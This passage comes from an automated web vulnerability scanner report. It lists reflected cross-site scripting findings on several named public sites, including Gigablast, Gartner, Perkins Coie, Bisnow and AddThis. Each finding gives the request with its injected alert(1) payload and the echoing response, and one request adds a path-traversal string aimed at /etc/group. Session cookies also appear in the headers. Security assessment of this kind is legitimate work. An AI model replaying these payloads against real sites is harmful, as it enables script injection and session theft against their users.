User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 551
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:11:59 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:11:59 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216719.1FE|1305216719.1OD|1305216719.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:11:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:11:59 GMT
Connection: close

_ate.ad.hpraf6a5<script>alert(1)</script>b51a3380c9e({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

5.6. http://ds.addthis.com/red/psi/sites/www.wi-ala.org/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wi-ala.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8d152<script>alert(1)</script>f8a0ec4641e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wi-ala.org/p.json?callback=_ate.ad.hpr8d152<script>alert(1)</script>f8a0ec4641e&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.wi-ala.org%2FClubPortal%2Fwala%2FNewsView.cfm%3FclubID%3D177%26NewsID%3D3733&ref=http%3A%2F%2Fwww.wi-ala.org%2FClubPortal%2Fwala%2F&1krsxxj HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 18:10:13 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 18:10:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 18:10:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 18:10:13 GMT
Connection: close

_ate.ad.hpr8d152<script>alert(1)</script>f8a0ec4641e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.7. http://gigablast.com/ [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gigablast.com
Path:   /

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce"><script>alert(1)</script>b200ebb607f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c=dmoz3217ce"><script>alert(1)</script>b200ebb607f HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2520
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:38 GMT
Date: Thu, 12 May 2011 15:16:13 GMT
Last-Modified: Thu, 12 May 2011 15:16:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<input type=hidden name=c value="dmoz3217ce"><script>alert(1)</script>b200ebb607f">
...[SNIP]...

5.8. http://labs.natpal.com/trac/js/ena.js [trkDomain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://labs.natpal.com
Path:   /trac/js/ena.js

Issue detail

The value of the trkDomain request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af87'%3balert(1)//7f2a306cc4e was submitted in the trkDomain parameter. This input was echoed as 3af87';alert(1)//7f2a306cc4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trac/js/ena.js?trkDomain=layserfreiwald.com3af87'%3balert(1)//7f2a306cc4e HTTP/1.1
Host: labs.natpal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 12 May 2011 18:08:59 GMT
Content-Length: 10334


var ydlVisitTypeCookieTTL = 14; // days
var ydlVisitTypeCookieName = 'vt';
var ydlPUT = 'p';
var ydlUUT = 'u';

function matchURL(detectionKey) {
   if(detectionKey == null) return true;
   var u
...[SNIP]...
ator.platform,
           subString: "Linux",
           identity: "Linux"
       }
   ]

};

BrowserDetect.init();

var url = 'http://labs.natpal.com/trk/pixel?trackid=' +
    '&trkDomain=layserfreiwald.com3af87';alert(1)//7f2a306cc4e' +
    '&referrer=' + escape(document.referrer) +
    '&pageVisited=' + escape(location.href) +
    '&browser='     + escape(BrowserDetect.browser) +
    '&
...[SNIP]...

5.9. http://layserfreiwald.com/attorneys.html [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload d38d6<img%20src%3da%20onerror%3dalert(1)>ef8373716d2 was submitted in the mode parameter. This input was echoed as d38d6<img src=a onerror=alert(1)>ef8373716d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /attorneys.html?mode=viewd38d6<img%20src%3da%20onerror%3dalert(1)>ef8373716d2&AID=8 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 7592

ERROR - UNSUPPORTED MODE (viewd38d6<img src=a onerror=alert(1)>ef8373716d2)!
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns
...[SNIP]...

5.10. http://m.perkinscoie.com/publications/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /publications/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93015"><script>alert(1)</script>40999349f56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications/?93015"><script>alert(1)</script>40999349f56=1 HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3814; PortletId=4736294; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:00:49 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3820; path=/
Set-Cookie: PortletId=4737494; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 10504
Content-Length: 10504


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

Publications


|
Perkins Coie Mobile Site
</title><meta name="viewport" c
...[SNIP]...
<a href="/publications/?93015"><script>alert(1)</script>40999349f56=1&amp;p=2"&gt;Next &gt;</a>
...[SNIP]...

5.11. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /new_york_commercial_real_estate_news_story.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74e0e<script>alert(1)</script>8e1c2fd2452 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new_york_commercial_real_estate_news_story.php74e0e<script>alert(1)</script>8e1c2fd2452 HTTP/1.1
Host: www.bisnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:55:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bisnowtest.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 12 May 2011 16:55:23 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /new_york_commercial_real_estate_news_story.php74e0e<script>alert(1)</script>8e1c2fd2452 was not found on this server.</p>
...[SNIP]...

5.12. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /new_york_commercial_real_estate_news_story.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 855d4<script>alert(1)</script>ea1f5dd84b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new_york_commercial_real_estate_news_story.php?855d4<script>alert(1)</script>ea1f5dd84b4=1 HTTP/1.1
Host: www.bisnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:55:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bisnowtest.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 12 May 2011 16:55:07 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /new_york_commercial_real_estate_news_story.php?855d4<script>alert(1)</script>ea1f5dd84b4=1 was not found on this server.</p>
...[SNIP]...

5.13. http://www.gartner.com/0_admin/PasswordRequest.jsp [startPage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/PasswordRequest.jsp

Issue detail

The value of the startPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe694"><script>alert(1)</script>7999e454e36 was submitted in the startPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /0_admin/PasswordRequest.jsp?startPage=https://my.gartner.com/portal/server.ptfe694"><script>alert(1)</script>7999e454e36 HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231772135:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:23:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U50D391B4].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22177

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Request Password</title>


<script src="/js/utility.js" type="text/javascript"></script>
<scr
...[SNIP]...
<input type="hidden" name="startPage" value="https://my.gartner.com/portal/server.ptfe694"><script>alert(1)</script>7999e454e36">
...[SNIP]...

5.14. http://www.gigablast.com/ [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e50e"><script>alert(1)</script>057ece81203 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c=dmoz31e50e"><script>alert(1)</script>057ece81203 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2520
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:29 GMT
Date: Thu, 12 May 2011 15:16:04 GMT
Last-Modified: Thu, 12 May 2011 15:16:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<input type=hidden name=c value="dmoz31e50e"><script>alert(1)</script>057ece81203">
...[SNIP]...

5.15. http://www.gigablast.com/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865e8"><script>alert(1)</script>502cfb23195 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=ip%3A216.32.120%20cars865e8"><script>alert(1)</script>502cfb23195&n=10&k0s=987832 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1542
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:03 GMT
Last-Modified: Thu, 12 May 2011 15:16:03 GMT

<form method=get><input type=hidden name="q" value="ip:216.32.120 cars865e8"><script>alert(1)</script>502cfb23195">
<input type=hidden name="s" value="0">
<center>Enter the 4 LARGE letters you see bel
...[SNIP]...

5.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5cac9(a)30f8c3192d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?5cac9(a)30f8c3192d3=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?5cac9(a)30f8c3192d3\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

5.17. http://www.hartfordbusiness.com/fs_webkit/fs_css_processor.php [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/fs_css_processor.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 47960<script>alert(1)</script>9af43b57f58 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs_webkit/fs_css_processor.php?src=/template/hbj/forms.fcss../../../../../../../../etc/group47960<script>alert(1)</script>9af43b57f58&color=primary!891709*sidebar!EEE1CE*link!0000FF*link_hover!ff0000 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd; __utma=231841670.1564481969.1305247369.1305247369.1305247369.1; __utmb=231841670.1.10.1305247369; __utmc=231841670; __utmz=231841670.1305247369.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; OAID=ff33d9b426ad063f746675f34d885b06

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:49:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 231

/* WARNING: I COULDN'T WRITE THIS FILE, THE DIRECTORY IS WRITE PROTECTED */
/* TRIED TO WRITE FILE : /app/production/nebm/universal/template/hbj/forms.css../../../../../../../../etc/group47960<script>alert(1)</script>9af43b57f58*/

5.18. http://www.hartfordbusiness.com/news14300.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d3ba"><script>alert(1)</script>22db1e31600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news14300.html8d3ba"><script>alert(1)</script>22db1e31600 HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=93a13061659f5cd464d2764d04966966; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:27 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:27 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34892

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<form method="post" action="http://www.hartfordbusiness.com/news14300.html8d3ba"><script>alert(1)</script>22db1e31600#comments" class="fs_form fill" id="comment_form">
...[SNIP]...

5.19. http://www.letipli.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 631ac--><script>alert(1)</script>0c466881b13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico631ac--><script>alert(1)</script>0c466881b13 HTTP/1.1
Host: www.letipli.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDACRSARSQ=PKIPPPGAJLLHAGEDEMMHOPGO

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 13 May 2011 00:48:45 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Content-Length: 18000
Content-Type: text/html
Expires: Thu, 12 May 2011 00:48:44 GMT
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="robots" conte
...[SNIP]...
<!-- ############# /favicon.ico631ac--><script>alert(1)</script>0c466881b13 -->
...[SNIP]...

5.20. http://www.letipli.com/member_details.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /member_details.asp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8e4b7--><script>alert(1)</script>76ff3e246a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member_details.asp8e4b7--><script>alert(1)</script>76ff3e246a7 HTTP/1.1
Host: www.letipli.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:02:26 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Connection: close
